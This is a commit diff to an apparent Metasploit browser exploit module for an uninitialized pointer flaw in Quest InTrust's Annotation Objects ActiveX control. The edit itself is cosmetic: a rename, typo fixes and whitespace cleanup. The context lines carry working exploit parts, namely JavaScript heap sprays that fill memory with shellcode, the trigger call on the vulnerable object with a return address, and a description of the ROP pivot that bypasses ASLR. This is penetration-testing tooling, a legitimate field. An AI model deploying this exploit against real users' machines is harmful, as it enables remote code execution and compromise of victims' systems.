Module rename. Cleanup whitespace. Fix typos.

2012-04-12 01:30:01 -05:00 · 2012-04-12 01:30:01 -05:00 · 0d739a1a51
parent 14f85e406f
commit 0d739a1a51
1 changed files with 54 additions and 55 deletions
--- a/modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb
+++ b/modules/exploits/windows/browser/annotation_objects_uninitialized_pointer_rce.rb
@ -1,7 +1,3 @@
 ##
 # $Id$
 ##
 ###
 # This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
@ -18,32 +14,31 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super( update_info(info,
-			'Name'           => 'Quest InTrust Annotation Objects uninitialized pointer remote code execution',
+			'Name'           => 'Quest InTrust Annotation Objects Uninitialized Pointer',
 			'Description'    => %q{
-					This module exploits a uninitialized variable vulnerability in the 
+					This module exploits an uninitialized variable vulnerability in the
 				Annotation Objects ActiveX component. The activeX component loads into memory without
 				opting into ALSR so this module exploits the vulnerability against windows Vista and
-				Windows 7 targets. A large heap spray is required to fulfil the requirement that EAX 
+				Windows 7 targets. A large heap spray is required to fulfill the requirement that EAX
-				points to part of the rop chain in a heap chunk and the calculated call will hit the 
+				points to part of the ROP chain in a heap chunk and the calculated call will hit the
-				pivot in a seperate heap chunk. This will take some time in the users browser.
+				pivot in a separate heap chunk. This will take some time in the users browser.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
 					'rgod <rgod[at]autistici.org>',             # initial discovery & poc
-					'mr_me <steventhomasseeley[at]gmail.com>',	# msf module
+					'mr_me <steventhomasseeley[at]gmail.com>'   # msf module
 				],
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					[ 'OSVDB', '80662'],
 					[ 'BID', '52765'],
-					[ 'URL', 'http://www.exploit-db.com/exploits/18674/'],
+					[ 'URL', 'http://www.exploit-db.com/exploits/18674/']
 				],
 			'DefaultOptions' =>
 				{
 					'EXITFUNC' => 'process',
-					'InitialAutoRunScript' => 'migrate -f',
+					'InitialAutoRunScript' => 'migrate -f'
 				},
 			'Payload'        =>
 				{
@ -114,8 +109,6 @@ class Metasploit3 < Msf::Exploit::Remote
 			end
 		end
 		print_status("Target selected: #{my_target.name}") if datastore['VERBOSE']
 		# Re-generate the payload.
 		return if ((p = regenerate_payload(cli)) == nil)
@ -141,6 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				memory = new Array();
 				for (i=0;i<1000;i++){ memory[i] = block+shellcode; }
 			}
 			function main(){
 				heapspray();
  				#{obj_name}.Add(#{my_target.ret},1);
@ -211,15 +205,19 @@ class Metasploit3 < Msf::Exploit::Remote
 				var data = payload;
 				while(data.length < 100000) { data += data; }
 				var onemeg = data.substr(0, 64*1024/2);
 				for (i=0; i<14; i++) {
 					onemeg += data.substr(0, 64*1024/2);
 				}
 				onemeg += data.substr(0, (64*1024/2)-(38/2));
 				var block = new Array();
 				for (i=0; i<700; i++) {
 					block[i] = onemeg.substr(0, onemeg.length);
    			}
 			}
 			function main(){
 				heapspray();
 				#{obj_name}.Add(#{my_target.ret},1);
@ -245,7 +243,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		</html>
 		EOF
-		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
+		peer = "#{cli.peerhost.ljust(16)} #{self.shortname}"
 		print_status("#{peer} Sending HTML...")
 		#Remove the extra tabs from content
 		content = content.gsub(/^\t\t/, '')